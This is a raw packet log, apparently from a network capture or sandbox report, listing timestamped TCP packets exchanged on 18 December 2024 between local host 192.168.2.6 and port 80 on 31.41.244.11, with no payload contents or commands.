                                                                                                                                                              Dec 18, 2024 11:47:55.753321886 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753345966 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753382921 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753382921 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753524065 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753542900 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753552914 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753565073 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753576040 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753587008 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753597975 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753606081 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753606081 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753608942 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753619909 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753632069 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753643036 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753654003 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753662109 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753662109 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753665924 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753676891 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753686905 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.753715992 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.753715992 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.754167080 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.754384995 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754398108 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754410028 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754473925 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.754473925 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.754491091 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754509926 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754519939 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754530907 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754543066 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754559994 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.754580975 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754591942 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754602909 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754614115 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754618883 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.754618883 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.754625082 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754637003 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754647017 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.754674911 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.754674911 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.755279064 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.755291939 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.755301952 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.755337000 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.755371094 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.755403042 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.755455017 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.755466938 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.755477905 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.755516052 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.755516052 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.755666971 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.755677938 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.756021023 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.758868933 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.759058952 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.759079933 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.760817051 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.762473106 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.762574911 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.763341904 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.818324089 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.818432093 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.875050068 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.875096083 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.875170946 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.876611948 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.876663923 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.876704931 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.876754999 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.880390882 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.880474091 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.880573988 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.880666018 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.884007931 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.884063959 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.884073019 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.884246111 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.887401104 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.887558937 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.887645006 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.887685061 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.890791893 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.890847921 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.890893936 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.894108057 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.894198895 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.894293070 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.894404888 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.897465944 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.897571087 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.897614002 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.897614002 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.900824070 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.900882959 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.900940895 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.901283979 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.904230118 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.904283047 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.904288054 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.904485941 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.907545090 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.907665014 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.907707930 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.910948992 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.911011934 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.911159992 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.911218882 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.914407969 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.914515972 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.914555073 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.917645931 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.917721033 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.917721033 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.917871952 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.920965910 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.921019077 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.921078920 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.921250105 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.924741983 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.924802065 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.924819946 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.924926043 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.927828074 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.927910089 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.927951097 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.927951097 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.931145906 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.931247950 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.932755947 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.932812929 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.932845116 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.933334112 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.936125994 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.936178923 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.936388016 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.936502934 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.939548016 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.939599037 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.939635992 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.942837000 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.942878962 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.942929029 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.943020105 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.946233988 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.946324110 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.946358919 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.946358919 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.949542999 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.949654102 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.949856043 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.950472116 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.953181028 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.953248024 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.953259945 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.953347921 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.956316948 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.956433058 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.956660986 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.959641933 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.959733963 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.959769011 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.959831953 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.964092970 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.964117050 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.964273930 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.966988087 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.967080116 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.967150927 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.967150927 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.969855070 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.970031977 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.970068932 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.970068932 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.973064899 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.973114967 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.973172903 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.976406097 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.976504087 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.976557970 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.979736090 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.979851007 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.979917049 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.983171940 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.983299017 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.983360052 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.986496925 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.986624002 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.986660957 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.986660957 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.989923954 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.989985943 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.989986897 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.990247965 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.993215084 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.993329048 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.993355036 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.993371010 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.996521950 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.996609926 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:55.996654034 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.996654034 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:55.999955893 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.000021935 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.000122070 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.000169039 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.003295898 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.003349066 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.003479958 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.003595114 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.006613016 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.006705046 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.006747961 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.006798983 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.010011911 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.010113001 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.010137081 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.010179996 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.013364077 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.013462067 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.013495922 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.013495922 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.016752958 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.016803980 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.016931057 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.017036915 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.020066023 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.020127058 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.020193100 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.020282030 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.023443937 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.023538113 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.023540020 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.023596048 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.028233051 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.028250933 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.028285980 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.030307055 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.031024933 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.031070948 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.031160116 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.031425953 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.034401894 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.034537077 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.034574986 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.034574986 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.037688017 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.037822962 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.037858963 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.037858963 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.041214943 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.041270971 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.041347027 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.042360067 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.044855118 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.045053959 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.045093060 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.045093060 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.048290968 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.048435926 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.048475027 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.048475027 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.051405907 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.051552057 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.051589966 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.051589966 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.054392099 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.054519892 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.054559946 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.054560900 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.057722092 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.057791948 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.057856083 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.058382988 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.061316967 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.061638117 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.061678886 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.061678886 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.064274073 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.064310074 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.064451933 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.065315008 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.066488028 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.066596031 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.066632986 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.066632986 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.069555998 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.069597960 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.069634914 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.069771051 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.072355986 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.072411060 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.072451115 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.074171066 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.075400114 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.075431108 CET804991031.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:56.075486898 CET4991080192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:56.075486898 CET4991080192.168.2.631.41.244.11
